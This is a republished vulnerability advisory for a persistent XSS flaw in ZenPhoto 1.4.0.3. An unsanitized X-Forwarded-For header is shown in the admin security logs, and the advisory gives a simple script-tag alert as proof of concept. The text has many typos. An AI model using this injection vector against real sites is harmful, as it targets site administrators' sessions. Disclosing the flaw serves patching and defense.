ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header presisiten

Source: Internet
Author: User
Tags zenphoto

# Exploit Title: ZenPhoto 1.4.0.3 patched 2011-4-19 x-forwarded-for HTTP

Header presisitent XSS

# Date:

# Author: Saif El-Sherei

# Software Link: http://zenphoto.googlecode.com/files/zenphoto-1.4.0.3.zip

# Version: 1.4.0.3 latest updated 2011-4-19

# Tested on: FF 3.0.15, IE 8

Info:

Zenphoto is an answer to lots of CILS for an online gallery solution that

Just makes sense. After years of bloated software that does everything and

Your dishes, zenphoto just shows your photos, simply. Its got all

Functionality and "features" you need, and nothing you dont. Where the old

Guys put in a bunch of modules and junk, we put a lot of thought. We hope

You agree with our philosopy: simpler is better.

Details:

Failure to sanitize "x-forwarded-for" HTTP header in security logs before

Being displayed in "zp-core/admin-logs.php", cocould allow a remote attacker

To inject malicious HTML code by altering the "x-forwarded-for" HTTP header

Using either an intercepting proxy or manual requests in security logs and

Attack any user with sufficient privilege to access "Security-logs", usually

Appliaction administrators by presistent XSS.

POC:

<Script> alert (Saif was Here); </script>

Regards,

Saif El-Sherei

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.